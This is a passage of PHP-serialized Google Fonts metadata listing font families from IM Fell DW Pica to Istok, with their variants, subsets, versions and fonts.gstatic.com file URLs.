Pica\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/imfelldwpica/v16/2sDGZGRQotv9nbn2qSl0TxXVYNw9ZAPUvi88MQ.ttf\";s:6:\"italic\";s:88:\"http://fonts.gstatic.com/s/imfelldwpica/v16/2sDEZGRQotv9nbn2qSl0TxXVYNwNZgnQnCosMXm0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:528;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"IM Fell DW Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/imfelldwpicasc/v21/0ybjGCAu5PfqkvtGVU15aBhXz3EUrnTW-BiKEUiBGA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:529;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"IM Fell Double Pica\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:95:\"http://fonts.gstatic.com/s/imfelldoublepica/v14/3XF2EqMq_94s9PeKF7Fg4gOKINyMtZ8rT0S1UL5Ayp0.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/imfelldoublepica/v14/3XF0EqMq_94s9PeKF7Fg4gOKINyMtZ8rf0a_VJxF2p2G8g.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:530;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"IM Fell Double Pica SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:101:\"http://fonts.gstatic.com/s/imfelldoublepicasc/v21/neIazDmuiMkFo6zj_sHpQ8teNbWlwBB_hXjJ4Y0Eeru2dGg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:531;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"IM Fell English\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/imfellenglish/v14/Ktk1ALSLW8zDe0rthJysWrnLsAz3F6mZVY9Y5w.ttf\";s:6:\"italic\";s:89:\"http://fonts.gstatic.com/s/imfellenglish/v14/Ktk3ALSLW8zDe0rthJysWrnLsAzHFaOdd4pI59zg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:532;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"IM Fell English SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:93:\"http://fonts.gstatic.com/s/imfellenglishsc/v16/a8IENpD3CDX-4zrWfr1VY879qFF05pZLO4gOg0shzA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:533;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"IM Fell French Canon\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/imfellfrenchcanon/v21/-F6ufiNtDWYfYc-tDiyiw08rrghJszkK6coVPt1ozoPz.ttf\";s:6:\"italic\";s:100:\"http://fonts.gstatic.com/s/imfellfrenchcanon/v21/-F6gfiNtDWYfYc-tDiyiw08rrghJszkK6foXNNlKy5PzzrU.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:534;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"IM Fell French Canon SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/imfellfrenchcanonsc/v22/FBVmdCru5-ifcor2bgq9V89khWcmQghEURY7H3c0UBCVIVqH.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:535;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"IM Fell Great Primer\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/imfellgreatprimer/v21/bx6aNwSJtayYxOkbYFsT6hMsLzX7u85rJorXvDo3SQY1.ttf\";s:6:\"italic\";s:100:\"http://fonts.gstatic.com/s/imfellgreatprimer/v21/bx6UNwSJtayYxOkbYFsT6hMsLzX7u85rJrrVtj4VTBY1N6U.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:536;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"IM Fell Great Primer SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/imfellgreatprimersc/v21/ga6daxBOxyt6sCqz3fjZCTFCTUDMHagsQKdDTLf9BXz0s8FG.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:537;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Ibarra Real Nova\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdg5MDtVT9TWIvS.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXdS5MDtVT9TWIvS.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXe-48DtVT9TWIvS.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlSdQiA-DBIDCcaWtQzL4BZHoiDundw4ATyjed3EXeH48DtVT9TWIvS.ttf\";s:6:\"italic\";s:109:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopyiuXztxXZvSkTo.ttf\";s:9:\"500italic\";s:109:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKopxquXztxXZvSkTo.ttf\";s:9:\"600italic\";s:109:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop_apXztxXZvSkTo.ttf\";s:9:\"700italic\";s:109:\"http://fonts.gstatic.com/s/ibarrarealnova/v20/sZlsdQiA-DBIDCcaWtQzL4BZHoiDkH5CH9yb5n3ZFmKop8-pXztxXZvSkTo.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:538;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Iceberg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/iceberg/v20/8QIJdijAiM7o-qnZuIgOq7jkAOw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:539;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Iceland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/iceland/v16/rax9HiuFsdMNOnWPWKxGADBbg0s.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:540;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Imbue\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP8iWfOsNNK-Q4xY.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP0iXfOsNNK-Q4xY.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP5aXfOsNNK-Q4xY.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP8iXfOsNNK-Q4xY.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP_qXfOsNNK-Q4xY.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoPxaQfOsNNK-Q4xY.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoPy-QfOsNNK-Q4xY.ttf\";s:3:\"800\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP0iQfOsNNK-Q4xY.ttf\";s:3:\"900\";s:100:\"http://fonts.gstatic.com/s/imbue/v21/RLpXK5P16Ki3fXhj5cvGrqjocPk4n-gVX3M93TnrnvhoP2GQfOsNNK-Q4xY.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:541;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Imperial Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/imperialscript/v3/5DCPAKrpzy_H98IV2ISnZBbGrVNvPenlvttWNg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:542;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Imprima\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/imprima/v16/VEMxRoN7sY3yuy-7-oWHyDzktPo.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:543;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Inconsolata\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v31\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"200\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU8aRr8lleY2co.ttf\";s:3:\"300\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp9s8aRr8lleY2co.ttf\";s:7:\"regular\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp4U8aRr8lleY2co.ttf\";s:3:\"500\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp7c8aRr8lleY2co.ttf\";s:3:\"600\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp1s7aRr8lleY2co.ttf\";s:3:\"700\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lpp2I7aRr8lleY2co.ttf\";s:3:\"800\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7LppwU7aRr8lleY2co.ttf\";s:3:\"900\";s:114:\"http://fonts.gstatic.com/s/inconsolata/v31/QldgNThLqRwH-OJ1UHjlKENVzkWGVkL3GZQmAwLYxYWI2qfdm7Lppyw7aRr8lleY2co.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:544;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Inder\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/inder/v14/w8gUH2YoQe8_4vq6pw-P3U4O.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:545;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Indie Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/indieflower/v17/m8JVjfNVeKWVnh3QMuKkFcZlbkGG1dKEDw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:546;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Ingrid Darling\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/ingriddarling/v2/LDIrapaJNxUtSuFdw-9yf4rCPsLOub458jGL.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:547;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Inika\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/inika/v21/rnCm-x5X3QP-phTHRcc2s2XH.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/inika/v21/rnCr-x5X3QP-pix7auM-mHnOSOuk.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:548;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Inknut Antiqua\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"300\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2vwrj5bBoIYJNf.ttf\";s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GSYax7VC4ot_qNB4nYpBdaKXUD6pzxRwYB.ttf\";s:3:\"500\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU33w7j5bBoIYJNf.ttf\";s:3:\"600\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU3bxLj5bBoIYJNf.ttf\";s:3:\"700\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2_xbj5bBoIYJNf.ttf\";s:3:\"800\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2jxrj5bBoIYJNf.ttf\";s:3:\"900\";s:89:\"http://fonts.gstatic.com/s/inknutantiqua/v14/Y4GRYax7VC4ot_qNB4nYpBdaKU2Hx7j5bBoIYJNf.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:549;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Inria Sans\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/inriasans/v14/ptRPTiqXYfZMCOiVj9kQ3ELaDQtFqeY3fX4.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/inriasans/v14/ptRRTiqXYfZMCOiVj9kQ1OzAgQlPrcQybX4pQA.ttf\";s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/inriasans/v14/ptRMTiqXYfZMCOiVj9kQ5O7yKQNute8.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/inriasans/v14/ptROTiqXYfZMCOiVj9kQ1Oz4LSFrpe8uZA.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/inriasans/v14/ptRPTiqXYfZMCOiVj9kQ3FLdDQtFqeY3fX4.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/inriasans/v14/ptRRTiqXYfZMCOiVj9kQ1OzAkQ5PrcQybX4pQA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:550;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Inria Serif\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/inriaserif/v14/fC14PYxPY3rXxEndZJAzN3wAVQjFhFyta3xN.ttf\";s:9:\"300italic\";s:85:\"http://fonts.gstatic.com/s/inriaserif/v14/fC16PYxPY3rXxEndZJAzN3SuT4THjliPbmxN0_E.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/inriaserif/v14/fC1lPYxPY3rXxEndZJAzN0SsfSzNr0Ck.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/inriaserif/v14/fC1nPYxPY3rXxEndZJAzN3SudyjvqlCkcmU.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/inriaserif/v14/fC14PYxPY3rXxEndZJAzN3wQUgjFhFyta3xN.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/inriaserif/v14/fC16PYxPY3rXxEndZJAzN3SuT5TAjliPbmxN0_E.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:551;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Inspiration\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/inspiration/v3/x3dkckPPZa6L4wIg5cZOEvoGnSrlBBsy.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:552;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Inter\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyfMZhrib2Bg-4.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuOKfMZhrib2Bg-4.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZhrib2Bg-4.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fMZhrib2Bg-4.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuGKYMZhrib2Bg-4.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZhrib2Bg-4.ttf\";s:3:\"800\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuDyYMZhrib2Bg-4.ttf\";s:3:\"900\";s:100:\"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuBWYMZhrib2Bg-4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:553;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Irish Grover\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/irishgrover/v23/buExpoi6YtLz2QW7LA4flVgf-P5Oaiw4cw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:554;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Island Moments\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/islandmoments/v3/NaPBcZfVGvBdxIt7Ar0qzkXJF-TGIohbZ6SY.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:555;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Istok 